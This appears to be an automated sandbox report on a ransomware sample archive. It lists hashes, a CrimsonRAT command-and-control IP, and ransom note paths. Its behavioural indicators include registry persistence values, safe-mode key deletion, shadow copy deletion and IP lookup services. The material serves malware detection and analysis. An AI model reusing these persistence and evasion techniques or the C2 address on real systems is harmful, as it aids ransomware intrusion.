Analysis
-
max time kernel
199s -
max time network
212s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00426.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00426.7z
-
Size
17.3MB
-
MD5
8cf2c7d415775b5196246520c2b59271
-
SHA1
82ef631a57e81daf3bb2e417eab8da6430ad20dc
-
SHA256
5eac949abc1ffef1ef1674274a591d10ba4007bd56162cc0c5bb43a99644506d
-
SHA512
cbd349f83deaaea2c0774e51eefc6863e3a0845f2e93b829c797e845c9852f5fd82922e7d6308322dd22b92d08cf9d4c166f6ee09eb04b024f85da7cbdba8ce1
-
SSDEEP
393216:4Y+JuAQ92vSTTF6Bmbm6+f90VZ5WT1J0o5ji7XyB1lczJ:WJOwGoBymJfY5WT1J0ayqjcl
Malware Config
Extracted
crimsonrat
172.245.87.12
Extracted
C:\Users\Admin\Desktop\HOW-TO-DECRYPT-4lrb9.txt
Extracted
C:\Program Files\7-Zip\Lang\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Buran family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cac-92.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Detects Zeppelin payload 1 IoCs
resource yara_rule behavioral1/memory/4000-1705-0x0000000000400000-0x0000000005678000-memory.dmp family_zeppelin -
Hades Ransomware
Ransomware family attributed to Evil Corp APT first seen in late 2020.
-
Hades family
-
Hades payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cb5-551.dat family_hades -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe -
Modiloader family
-
Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
description pid Process procid_target PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 PID 2004 created 436 2004 taskmgr.exe 145 -
VashSorena Golang binary 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023caf-100.dat family_vashsorena -
VashSorena Ransomware
Ransomware family with multiple versions/spinoffs. Decryption of files is generally possible without paying the ransom.
-
Vashsorena family
-
Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
-
Zeppelin family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cb3-133.dat modiloader_stage2 -
Renames multiple (163) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (3452) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 3 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SayCheese.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 34 IoCs
pid Process 2940 HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe 3112 HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe 4432 HEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 2096 HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 1556 Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe 2076 Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe 4200 Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 1472 Enhancement 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 736 SayCheese.exe 3672 Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe 436 Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe 1164 Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe 1672 config.exe 4000 Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe 4896 y_installer.exe 1908 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe 3516 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe 3040 VHO-Trojan-Ransom.Win32.Encoder.gen-f246d574704530d9e191350c1d4ecf118e4cb5444e598c16351fd02acc3fe928.exe 4052 y_installer.exe 6092 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 2996 lsass.exe 632 Chromium Updater Module.exe 5556 Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe 5432 lsass.exe 3404 lsass.exe 5964 Fast.exe 1800 Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe -
Loads dropped DLL 17 IoCs
pid Process 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 1740 HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe 2096 HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 648 HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe 2004 taskmgr.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4244 icacls.exe 5220 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0dda7230-3da2-4000-b101-6367093b30da\\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe\" --AutoStart" HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ebae5ddd-6f41-43a7-af86-4b49c73c4f64\\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe\" --AutoStart" HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start" Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromium Update Module = "C:\\Users\\Admin\\AppData\\Roaming\\Chromium Updater Module.exe" Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fast = "\"C:\\Users\\Admin\\AppData\\Local\\Fast\\Fast.exe\" /delay 0" HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe" Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 36 IoCs
description ioc Process File created C:\Users\Admin\Documents\desktop.ini config.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini config.exe File created C:\Users\Public\Videos\desktop.ini config.exe File created C:\Users\Admin\3D Objects\desktop.ini config.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini config.exe File created C:\Users\Public\AccountPictures\desktop.ini config.exe File created C:\Users\Public\Desktop\desktop.ini config.exe File created C:\Users\Public\Documents\desktop.ini config.exe File created C:\Users\Public\Libraries\desktop.ini config.exe File created C:\Users\Admin\Desktop\desktop.ini config.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini config.exe File created C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini config.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini explorer.exe File created C:\Users\Admin\Contacts\desktop.ini config.exe File created C:\Users\Admin\Downloads\desktop.ini config.exe File created C:\Users\Admin\Favorites\Links\desktop.ini config.exe File created C:\Users\Admin\Music\desktop.ini config.exe File created C:\Users\Admin\Pictures\desktop.ini config.exe File created C:\Users\Admin\Saved Games\desktop.ini config.exe File created C:\Users\Admin\Videos\desktop.ini config.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini config.exe File created C:\Users\Public\Music\desktop.ini config.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini explorer.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini config.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini explorer.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini explorer.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini explorer.exe File created C:\Users\Admin\Links\desktop.ini config.exe File created C:\Users\Admin\Searches\desktop.ini config.exe File created C:\Users\Public\Downloads\desktop.ini config.exe File created C:\Users\Public\Pictures\desktop.ini config.exe File created C:\Users\Public\desktop.ini config.exe File created C:\Users\Admin\Favorites\desktop.ini config.exe File created C:\Users\Admin\OneDrive\desktop.ini config.exe File created C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini config.exe File created C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini config.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: lsass.exe File opened (read-only) \??\H: lsass.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\U: lsass.exe File opened (read-only) \??\S: lsass.exe File opened (read-only) \??\R: lsass.exe File opened (read-only) \??\G: lsass.exe File opened (read-only) \??\X: lsass.exe File opened (read-only) \??\M: lsass.exe File opened (read-only) \??\I: lsass.exe File opened (read-only) \??\E: lsass.exe File opened (read-only) \??\L: lsass.exe File opened (read-only) \??\Z: lsass.exe File opened (read-only) \??\V: lsass.exe File opened (read-only) \??\P: lsass.exe File opened (read-only) \??\O: lsass.exe File opened (read-only) \??\N: lsass.exe File opened (read-only) \??\B: lsass.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\W: lsass.exe File opened (read-only) \??\Q: lsass.exe File opened (read-only) \??\J: lsass.exe File opened (read-only) \??\Y: lsass.exe File opened (read-only) \??\T: lsass.exe File opened (read-only) \??\A: lsass.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 141 iplogger.org 143 iplogger.org -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 64 api.2ip.ua 117 geoiptool.com 128 api.2ip.ua 63 api.2ip.ua -
Drops file in System32 directory 44 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\KERNEL32.DLL UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\gdi32full.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\shcore.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\Wldp.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\MSCTF.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\apphelp.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\imagehlp.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\ws2_32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\PROPSYS.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\version.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\GLU32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\wsock32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\kernel.appcore.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\TextShaping.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\advapi32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\msvcrt.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\shell32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\imm32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\psapi.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\winmm.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\ntdll.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\KERNELBASE.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\sechost.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\hhctrl.ocx UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\uxtheme.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\msimg32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\combase.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\comdlg32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\SHLWAPI.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\profapi.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\explorerframe.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\windows.storage.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\RPCRT4.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\user32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\win32u.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\GDI32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\opengl32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\clbcatq.dll 